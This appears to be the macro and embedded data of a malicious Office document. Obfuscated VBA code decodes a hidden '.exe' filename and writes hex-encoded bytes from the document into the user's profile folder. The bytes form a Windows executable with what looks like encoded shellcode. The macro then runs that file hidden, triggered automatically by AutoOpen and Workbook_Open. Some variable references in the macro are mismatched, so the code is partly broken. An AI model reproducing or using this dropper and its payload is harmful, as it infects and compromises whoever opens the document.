Dim ihkfqdupbjmccvndfqkr As Integer
Dim asubgqvzmprbnwwrg As String
Dim kskxczctstnn As String
Dim aryyrsusjictuu As Integer
Dim Ocbkj4 As Paragraph
Dim mtphndodfugyvurkawxs As Integer
Dim jcidsljyrh As Boolean
Dim dcsjctvvngmkzyfg As Integer
Dim njraeemfbthybj As String
Dim dcenhyjkhrcztvetmuok As Byte
Dim iecidiwlmagdgacuh As String
iecidiwlmagdgacuh = ypqkgprlrkwz("536f77") & ypqkgprlrkwz("64746965647970")
asubgqvzmprbnwwrg = ypqkgprlrkwz("486b686e47535456") & ypqkgprlrkwz("787077632e657865")
kskxczctstnn = Environ(ypqkgprlrkwz("5553") & ypqkgprlrkwz("455250524f46494c45"))
ChDrive (kskxczctstnn)
ChDir (kskxczctstnn)
aryyrsusjictuu = FreeFile()
Open asubgqvzmprbnwwrg For Binary As aryyrsusjictuu
For Each Ocbkj4 In ActiveDocument.Paragraphs
DoEvents
njraeemfbthybj = Ocbkj4.Range.Text
If (Ocbkj9 = True) Then
mtphndodfugyvurkawxs = 1
While (Ocbkj8 < Len(njraeemfbthybj))
dcenhyjkhrcztvetmuok = Mid(njraeemfbthybj, Ocbkj8, 4)
Put #Ocbkj3, , dcenhyjkhrcztvetmuok
mtphndodfugyvurkawxs = mtphndodfugyvurkawxs + 4
Wend
ElseIf (InStr(hctgnzghgt, Ocbkj11, Sowdtiedyp) > 0 And Len(njraeemfbthybj) > 0) Then
jcidsljyrh = True
End If
Next
Close #Ocbkj3
lbqzxzrjlnkkijky (asubgqvzmprbnwwrg)
End Sub
Sub lbqzxzrjlnkkijky(emmlbielcbwhdlz As String)
Dim ihkfqdupbjmccvndfqkr As Integer
Dim kskxczctstnn As String
kskxczctstnn = Environ(ypqkgprlrkwz("5553") & ypqkgprlrkwz("455250524f46494c45"))
ChDrive (kskxczctstnn)
ChDir (kskxczctstnn)
ihkfqdupbjmccvndfqkr = Shell(emmlbielcbwhdlz, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
PAYLOAD Data
Sowdtiedyp
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H00&H34&H0B&H08&HE8&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H69&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&HB8&H00&H20&H40&H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&HD9&HE9&HB8&H6C&HF0&H57&H6D&HD9&H74&H24&HF4&H5A&H2B&HC9&H66&HB9&H04&H02&H83&HC2&H04&H31&H42&H16&H03&H42&H7A&H12&HA2&H5C&H42&HBA&H45&H8F&H02&H3B&H32&H50&HB2&H5F&H33&H8E&H08&HA0&H65&H4E&H00&H05&HA2&H89&HAC&H9D&HC1&H72&H7F&H17&H98&HD5&HFC&H67&HDF&HE8&H52&H67&HE3&H5A&H62&HB3&H97&HCA&H24&HB1&H2F&H82&H1E&H2D&H31&HD8&H59&H9A&HAA&H25&H52&H47&HDC&H2E&H27&H27&H83&H17&H1F&HDC&HA8&H29&H66&H4F&H63&HD7&H62&HF8&HD2&HF7&HEA&H2A&HC8&H3A&H4B&HD1&HFA&HB8&HCD&HA8&HFE&HE9&H8E&H27&H56&H53&HE4&H63&HDA&HB0&HA2&HDE&HE8&H58&HD4&HB2&HDF&HDC&HDD&H7C&H13&HC4&HC7&HC0&H69&H39&HC8&HAF&HF9&HF0&HBD&H35&H85&H1F&H03&HD3&HAD&H7C&H68&H08&H9A&H21&HA5&HF7&HA1&HF8&H11&H82&H71&H19&H32&HD2&HAB&HA4&H47&H31&H0D&HB1&HA5&HD1&H99&HD0&HA1&H51&HF0&H83&HBD&H3A&H43&H12&H95&H64&H9D&H93&H5C&H0E&HFE&H19&H7C&H56&HC3&H8E&HCE&H86&H7A&H72&HFF&H48&H9B&HFB&H20&HAD&HF1&HC9&H69&H04&H6E&H3C&HD2&H7C&H21&H21&HA9&H94&H26&H57&H64&H0A&HDB&HA9&HCA&HAF&HEE&H35&H24&HCB&HDA&H97&HCE&H38&HD5&H22&H98&H06&H5C&HBA&H19&H11&HD8&HE0&HCA&H81&H35&H6A&H8F&H1A&HF0&H16&H5E&HF8&H61&H3D&H3
C&HB9&H61&HEB&HB2&H98&H3F&H11&H24&H93&H1D&H56&H59&H52&HE3&H09&HB1&H04&H09&H56&H45&HCD&HB3&H6F&HC8&HBE&H84&H4A&HCA&H57&H97&H19&H42&HAA&H65&H04&H4B&HA8&HBF&H99&H4A&H0D&H14&H6D&HAD&H05&HC4&H50&HDB&H45&HA9&H6A&H93&H69&H80&H16&H10&H9D&HA9&H24&H63&HDD&H4B&HAB&H32&H19&HBA&H49&H7D&H22&H82&H7D&H44&H4E&H9A&HD5&HDC&HEF&H02&H97&H3F&HEA&H3E&H7D&H76&HC4&HEA&H81&HFF&HF1&H85&H0A&H77&H1D&H07&HD9&HF1&HFC&HC9&HAD&HE3&H1C&H59&HD2&HC5&H6B&H6A&H01&H4F&H1E&H54&H72&HD9&H4C&H7E&H30&H3B&H6B&HFA&H4F&HFC&H8A&HAD&H79&H63&H94&H07&H45&HF1&HE6&HBE&HBD&HA6&H93&H81&HAC&H1C&H29&HC1&H69&HF5&H72&H3B&HAB&HA9&H02&H79&HBD&H2A&H36&H95&H24&HAF&H8E&HF0&H0A&H14&H57&H0E&H6A&HF8&H6B&H04&HA1&HD4&HA3&HFD&HCD&HF1&H54&HC3&H0B&H5F&H5A&HD7&H85&H2C&H8F&H73&H4D&H66&H9D&H33&HC3&H08&HF4&HA2&HA4&H06&H57&H71&HE7&H2F&H00&HC2&H6D&HCC&H82&HF0&H0F&H20&HA9&HD4&HBC&H9C&H38&H50&HDE&H6D&H98&H39&H10&H86&H64&H8E&H47&HC6&HA7&H74&HE7&HBF&HA3&H7B&H37&HCB&H57&HCF&H75&H28&H3E&H13&HA1&HDC&H45&H73&H70&HEB&HE6&H65&HC4&HA6&H6B&H32&HBF&HB5&H7C&HC6&H3F&H19&H7F&H5C&HCE&H47&H23&HE1&H02&H
FE&H5F&HFB&H53&H77&HAA&HB1&HAA&H2F&H21&H13&HC6&HD4&H78&HC7&H6C&HCA&H81&H64&H76&H80&H05&H1F&H78&HCB&H4F&H8F&H8C&HF4&H11&H5B&HA4&H2D&H25&HC9&H66&HCF&HBB&H14&HB5&H28&HBC&HA8&HC8&HD9&H6C&H43&HFD&HA1&H2C&H4C&H9A&H72&HBD&H65&H90&H68&H70&HA7&HF8&H51&HE3&H92&H7D&H63&H2E&HC6&H98&HC8&HBB&HDC&H84&H27&H56&HC2&H81&HE3&H9B&HC3&H17&HDA&HC8&HD1&HE2&H71&HF9&H7B&H56&H6F&H59&H8B&H06&H48&H31&H2E&H80&H6C&HF1&H48&HC8&HDF&H9F&HBB&HDF&H32&H09&HEC&HD3&H78&H64&HDF&HA8&HE0&H4E&H88&HF4&HF0&HA3&HCD&HB4&H85&H35&HA1&H6D&HC0&H2C&H4F&HD3&H82&H40&H1F&H54&H60&H91&HC1&H6A&H57&H1E&HF8&H14&HA2&H1F&H13&H24&H51&H67&H2D&HC0&H27&H9A&HB7&HA6&H18&H2D&HC2&HCD&H73&H71&H9F&HD9&HB0&H62&H50&HAB&H37&H5C&H88&HD4&HBC&H65&H39&HF8&H21&HD3&H93&H41&HB0&H3F&H5D&HDF&H43&H0D&H22&HAD&H0E&H48&HC9&H34&H7C&HB2&H6D&HD7&H7E&HE6&H44&HD6&H80&H48&H85&H84&H39&H57&H7F&HF8&H4B&HE1&H49&H52&H69&H36&H8F&HC4&H15&HF1&H31&HCE&HD9&H97&H84&H3D&H8B&HFD&H2D&HFD&HD9&HAF&HD8&HA0&H66&HFE&H86&H2D&H19&HA6&H50&H24&H79&H49&HC6&HC8&HD4&HB5&H0E&HC2&H4C&H14&H86&HFB&HD3&H04&H75&H39&HD1&H31&H94&HA6&
H65&H47&H7A&H1B&H1B&H0A&H9F&H58&H18&HC7&H71&H1D&H82&HA8&H99&HC3&HF2&H24&H3D&H3C&HD5&H95&HE3&H3B&HED&H45&HE7&H59&HD0&H20&H0D&HD5&HE6&H65&H07&HE2&HA9&H6E&H45&H83&HAA&HC8&HC6&H01&H30&HAA&H88&H0D&HD8&HF2&HF2&H3F&HF8&H71&H91&H06&H22&HE2&HF3&H66&H70&H3A&H75&H9D&H7C&H1E&H12&HD3&H8A&H63&H49&H2B&HD1&HE3&H51&H0A&HEE&H69&H46&HEA&H4E&H2C&H1D&H71&H49&H3E&H71&HD1&HF6&HB1&HC3&HF5&HDC&HEF&HF2&HF3&H02&H9C&H3B&H48&HF3&H3B&H46&H4B&HD0&H5E&HD7&H84&HDE&H4B&H92&H36&H58&H06&H1B&H76&H4E&H55&H82&HA1&HA2&H39&HB4&H91&HCE&H95&H87&HB2&HF3&H28&H51&H18&H77&H91&H51&H18&H0F&HCF&H45&H0D&H7D&HE7&H9A&H82&H1C&H2C&H62&H67&H05&HB9&HA2&H72&H0B&H1A&HA8&HD4&H5F&H30&HEC&H57&HC3&H6B&HEF&HAE&H6F&H28&HB6&HD9&HC3&HF4&H27&H46&HE4&H99&H32&H53&HF9&H4F&HC8&HB2&HD0&HD6&HA4&H19&H51&H5E&H22&HAE&H83&H85&HE2&HDC&H76&HF4&H94&H28&H78&H0B&H5D&H03&HDF&H24&H9A&H19&H81&HA7&HE5&H7B&H9C&HC0&HA7
&H96&HC3&H3D&HF8&H4B&HA8&H15&H96&H9E&H1D&H97&H5A&H83&H5E&H50&HF4&H30&HDF&H4C&H1F&HD2&HAB&HC0&H69&H89&H0C&HAD&HFE&H8A&H7A&HBA&HE3&H2A&HEF&HE8&HAF&H39&HC0&HDE&HB2&H04&H3B&H52&H79&H77&HEC&HE8&HC8&H29&H69&HC9&HB7&H87&HD4&H3E&HC2&HC8&H10&HBB&H0A&HA6&H32&H84&H54&HD8&H3E&HFC&H73&H82&HF2&H75&HEC&HCD&HAB&HD9&H45&H0F&H92&H6F&H6C&H79&H05&H59&HA3&HD6&HC4&HEA&H2D&H25&H82&HC0&H50&HBE&H06&H17&H96&HB1&HD7&H6C&H71&H3A&H3A&H68&H61&H3F&HCF&H3A&H70&HF4&H6E&HBC&HA2&H57&HFA&H49&H9F&H25&H45&H7B&HB4&H72&HC6&H72&HBB&HBC&HAE&HA7&H49&H93&H50&HB3&H4F&H24&H7E&H8C&HC3&H4A&HA6&H1D&HD0&HA2&HB9&HC7&H3F&H8A&HFF&HF7&H10&H57&H25&H88&HD8&H94&H05&H8C&H58&H16&HAB&HD4&HC2&HD8&H8D&HFF&HC3&H8A&HBF&H81&H90&H47&H98&H80&H66&H9B&HF5&HE5&HA2&H9D&HCA&H68&H3C&H8D&HAD&H2A&H79&HFD&H20&HE3&H7C&HAF&HDC&HD6&H25&H69&H92&H31&HD0&HD3&H70&H6E&H5F&H4B&H64&HA6&H50&H96&H1B&H15&H88&H87&H71&H4A&HF9&HD9&H8B&H4C&HF6&HD2&HA8&HD0&H95&H68&HA7&H1F&H80&H76&H9B&HDC&HC2&H74&H99&H38&HC7&HBE&H55&H59&HE3&HE9&H64&H68&H8E&H5D&H43&H1A&HA0&H77&H6A&HB5&H0D&H9A&H91&H71&H53&H63&H5A&H5A&H8
C&H86&H81&HEA&H64&H1C&HFF&H2C&H25&H1A&HA3&HFB&H37&HE3&HBF&H97&H78&H3F&H8A&H10&HF2&H6F&HF6&H07&HC6&HA0&H97&HE8&HCA&H57&HDF&H33&HF6&H41&H1D&H2F&HCF&H81&H13&H69&H2C&HED&HCF&H93&H5A&H3F&H9A&H45&HA6&HAD&H4B&H37&H19&H4F&H66&HF5&H1D&HDF&H8B&HF1&HF6&H9B&H7A&H7F&H21&HBB&H86&HAD&HD3&H95&HAD&H0A&HE7&H10&HB5&HD1&HD6&H3E&H1B&HED&H53&H99&H5D&HD2&HBE&HAC&HF0&H5C&HD7&H28&HD9&HA8&HFC&H3A&H68&HC7&H19&H98&H5C&H2B&H02&H1B&H14&H41&HCB&H1D&H89&H43&H54&H4C&H00&H36&H62&HA0&HF1&H55&H06&H01&H96&HFF&H57&HC9&HFA&H8B&H8E&H60&HEF&H15&HF0&HBF&HD8&H3B&H69&H20&H70&H61&H76&HCB&H6B&H14&H82&H80&HDE&H21&H11&H30&HC0&H6A&HE5&HBF&H77&H55&HC4&HF8&H5D&H12&HBC&H8D&HBC&HB2&H31&H9F&HF6&H31&HF3&HAD&HCF&H34&H26&HCF&H62&HAF&H11&H0A&H52&H05&H28&H8D&H2C&H73&H77&H38&H53&H95&H79&H9A&HC9&HAA&HE7&H33&H9B&H5E&H1D&H65&H88&HA8&HA4&H76&H6D&HEB&H62&H90&HA6&H2C&H9A&HED&H6F&H33&H58&HA1&HB4&HB7&H92&H19&H04&HEA&HFD&H2B&H1A&HFD&H9E&HD8&H92&H07&H62&H5A&H55&HB1&H9D&H31&HDB&HC7&H00&H4C&H70&H7D&HAB&HDD&H8A&H79&HA4&HFD&H5F&HA3&H81&HF1&H16&H76&H8B&H97&HD1&HCA&H41&H4E&H9F&H88&H
F8&H2B&HC5&H93&H34&H59&H70&HB1&H00&HE4&H6E&HCE&HEE&HA3&HC2&HA6&HC7&HE7&H80&H11&HE5&H6C&H98&H15&H50&H17&HBA&H01&H83&H25&H19&H9D&HD1&H49&HC3&HFB&HB4&HC7&H21&H92&HA2&HA5&HC4&HC1&H21&H1F&HAA&HEC&HFB&H64&H10&H5A&H50&H04&HC8&H49&HC7&HDB&H35&H45&H50&H77&H07&HF5&H49&H36&H6E&HFA&H47&H2C&HB8&H73&H5B&HB3&HB0&H80&H5B&HF7&HE3&H07&H6E&HAB&H4A&H98&H34&H66&H1F&HF8&H8E&H25&H30&HDC&H02&HFA&HF4&H01&H60&H1D&H18&HC0&HA4&HCC&H2A&H98&H88&HF7&H1C&H66&H1B&H7D&H30&HD8&HE4&HFC&H79&HD8&HC0&HA8&H86&H7C&H55&H77&H77&HD1&H91&H0A&H93&H52&HFF&H46&HE5&HC4&HB2&H0B&HE8&H3D&H0F&HE9&H8F&H1E&HDB&H31&HE4&H9A&H69&H01&HA0&HA7&H5C&HA5&H5E&HF4&H39&H0F&H86&H27&H04&HEF&H21&H3E&H41&H51&H08&HDB&HBB&HDD&H6A&H2F&H9E&H36&H4F&HEB&H2B&H67&H7D&HC1&HDB&H6C&HED&H95&H69&H93&H1F&HD2&H81&HB2&HEB&H81&H59&H21&HC6&HF3&H60&H83&H85&H27&HE0&H0A&H03&H8C&H0B&HDD&H75&H32&HBB&HAD&H28&H39&HDB&H52&HBB&H72&HB8&HEB&H77&HCD&HEC&H40&H96&HE1&H61&H13&H3E&H72&H8E&HCA&H75&H45&H04&H0B&H8A&HA4&H67&H5D&H97&H2C&HC8&H42&H11&H09&HF8&H81&H07&H95&H2E&HCD&H89&HDE&H1C&H74&H69&H7D&HA0&HC3&H33&HBD&
H0B&HBE&H6E&H6E&H13&H80&H8D&H53&H88&H81&HD6&HBC&H1E&H0E&HE5&H54&H7C&H73&H4E&HE0&H8B&HED&HEF&H8F&HC4&HD9&HD7&H33&H86&H73&H30&H55&HEE&HEE&H9E&HC0&H68&H84&HFB&H19&HA9&H1A&H47&HA1&H15&HB7&HA5&H1F&HDC&H52&H2F&HBA&HD6&HCE&H75&H97&HA1&HAE&H36&H80&HFA&HCC&H33&HBF&HAE&H38&H7B&H4B&HE1&H5A&HF6&H72&H05&HFA&HCA&H98&H86&H6F&H87&H4A&H3D&H27&H94&HA9&HEC&H01&HF1&HC0&H34&H33&HD1&HCC&H32&HD8&HD0&H94&HCA&H52&H65&HA1&HA7&HD0&H71&H92&HF8&H69&H1E&H3D&HB4&H49&H87&HE6&H72&HF8&H20&H90&HEE&HF3&HDD&H50&H39&H9D&H94&H64&H04&H79&H4E&H18&H74&H55&H13&HE0&H3A&H57&H67&H5E&H6F&H12&H7E&H35&H59&H1D&H16&HAC&HEC&H16&HE0&HEB&HCE&H58&H0F&HBB&H52&H50&H22&H6C&HFF&H21&HE5&H01&H6A&H67&H21&HD9&HF7&H0E&H82&HF5&H97&H0A&H76&H5E&HFB&H14&H27&H70&HA3&H89&H85&H25&H69&H43&H76&HC4&H50&H28&HDC&H94&HEF&HBA&H5A&HFC&H51&H83&H7C&H10&HE8&H87&H26&HA6&HFD&HEB&HF2&H3A&H95&H48&H00&H4D&H73&H6F&H20&H5F&H17&H4B&HE4&H2B&H9C&H5A&HE7&HBD&H4E&HF0&H20&H83&H0F&HB5&HB2&H0A&H08&HF2&HD6&H22&H95&H29&H6D&HBD&HD6&H72&HB7&HCF&HB7&HC0&HDF&H3B&HFA&HAB&H33&H9E&HC6&H56&H81&H77&H38&HCA&H19&HBB
&H1E&H03&HB8&HC6&H12&H05&H0A&H5A&HCF&HAE&HDB&H50&HFF&H6C&H8C&HEF&H00&HF9&HB6&H34&HC5&H02&HEC&H9C&H8F&H3E&H18&H98&H3E&HD3&H2C&H3C&HCF&H49&H76&HEA&H38&H10&H8A&HFA&H9C&HE6&HED&HC9&H9C&HA8&HF4&H76&H38&HAA&HBE&HC8&H78&H52&H93&HE7&H6C&HAB&H14&H95&H3D&H38&HFB&H74&H10&H5B&H5B&H45&H50&H97&H49&HA6&HE0&H16&HD4&H47&H71&HB6&H7B&H85&H77&HEE&H21&H31&HF8&H5A&H38&H98&H68&HA8&H48&HE9&HDC&H87&H2E&H55&HC8&HAB&H5F&H52&HB0&HF3&HF2&H47&HC8&H27&H66&H2A&H99&HB3&H33&H05&H2F&H54&HCA&H61&HE0&H88&H77&HCB&H94&H64&HD0&H9D&HF6&HD0&HE7&HC9&HCA&H7A&HC9&HFC&H38&H73&H56&HB8&H3F&H89&HFD&HCE&H16&H3C&H55&H56&HE1&HCE&H14&H15&HF3&HCB&HF0&HDB&HF6&HE9&HE3&H81&H18&H80&H7E&H97&HC6&H11&HA5&HF7&H77&HB8&H9A&HBE&H08&HFE&H92&H1A&HA0&HD9&H23&H66&H28&HA4&HDF&HFE&HEF&H93&HBE&HE6&H4E&HA4&H20&H4B&HE1&H4B&H72&HDA&H24&HF3&H65&HB6&H8F&H16&H57&H4A&H38&H57&HEB&HD8&H5A&H7C&H68&HA7&H26&HF8&H8E&H8F&H7F&H0D&H90&H82&H2F&HD1&HAF&H67&H38&HE8&H6C&H14&HA3&H97&H96&HB7&H93&H78&HE1&HE2&H40&HA0&H66&H33&HD7&H5C&HC5&HEA&HEA&H19&H01&H47&HC1&H1C&H76&HEF&H66&H88&H80&H52&H13&HE9&HA0&HB
A&H01&HCC&H27&H42&H7F&HFD&HDC&HD8&H50&H14&HA7&HA5&HA0&HE5&H4C&HD9&H1F&H74&H43&H10&H15&H9D&H4F&HF8&H6E&HCE&HCB&H34&HAF&HD6&H17&H08&H62&H5D&H81&HEC&H9A&HAA&HBE&H5D&H80&H82&HD8&HA6&H5F&HA3&H6A&HA5&HB1&HE0&H4D&HFD&H5E&H11&H1C&HAA&HB0&HC0&HA5&HC1&H8D&H70&H93&H65&H99&HBB&H5C&H62&H16&H38&H3E&H22&H7E&H2E&H53&HFC&HCE&H2C&H30&H59&HD4&HF7&H39&HAD&H7F&H3E&HE4&H4D&H38&HFF&HE4&H95&H4F&H7A&H82&H18&H0B&H3F&H3A&H2A&HA2&H14&H87&HA5&HCD&HCF&H17&HA0&H73&HED&H95&H7D&HFE&HB8&H4F&HB4&H7D&HDC&H78&HBD&H2D&H72&HF2&H07&H3A&HC4&H88&H80&H7E&H00&HDB&H42&H47&H46&H49&H23&H83&HE2&H1C&H60&H49&HC4&HA9&H4F&H15&HC9&HA6&H92&HF6&H12&HD2&H53&HC7&HB4&HCB&H70&HF9&HE0&H54&H8D&HA1&H53&H68&H52&H9E&H78&HE9&H0F&H62&H15&H11&HDF&H81&HC7&H8C&H90&HD9&H4A&H00&HBE&HBE&H5B&H23&H37&H40&H48&H57&H7B&HF5&H70&HA9&H94&H41&H32&HFC&HCE&H53&H3D&HE9&H09&H97&H3D&HB0&H19&HED&H2D&H7B&H05&HD2&H2C&HD4&H56&H4D&H6E&H5D&H03&H67&HE2&H36&H52&H82&H51&H26&HB8&H1F&HE3&H48&HD1&H85&HEF&H2D&HD1&H41&HEF&HA7&HF8&H6F&HA8&H95&HB9&H3E&H0C&H84&H7E&HEF&HD1&HA6&H4E&HCA&H0A&HBC&H5F&HD3&HD8&HDB&H
C3&H72&HDE&HCE&H60&H1D&HC7&H07&HB2&HD6&H9C&HEF&H16&H23&H32&H7D&HD8&H5E&HAF&H55&HBE&HB0&H25&H80&H45&H6B&H70&HDF&H9C&H84&H7F&H4B&H5F&H4F&H0F&H20&H35&HB3&H2F&HBD&HE7&H17&H38&HD8&H6E&HB1&HAA&H63&H16&HC8&H24&H17&H04&H97&H80&H4D&H6D&HBB&H2F&H35&H6D&HDC&HCD&H9D&H7C&H29&H31&H1E&H48&H6C&H47&H6E&H20&HC2&H08&H7A&H11&H5E&HCC&H39&H8B&HA7&H1D&H78&HDB&H0F&HDD&H12&H18&H5D&HF8&H03&HAD&H5E&H8A&H61&H93&H51&HB8&HE1&H81&H87&H0C&H53&H0E&HE6&H73&HF9&H4E&HDD&H2B&HA6&HE4&HEA&HD8&HC8&H82&HA1&HD5&H97&HC3&HF7&H15&H8F&H9B&HE4&H12&H6D&HC4&HAB&H26&H4A&H50&H59&H3C&H64&H10&H9F&H12&H04&H9C&HC9&HC9&HF6&HD3&H3D&H93&H15&H6A&HE4&H89&H48&H69&HD8&H54&H6F&HB5&H1D&H05&HE0&H25&HFF&H8D&H92&HBF&HD2&H04&H1B&HD8&H2A&HA4&H34&HD6&HAE&HFB&H7F&HEC&H5A&H07&H63&H81&HC1&H1D&H96&HD2&H39&H23&H35&H07&H94&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
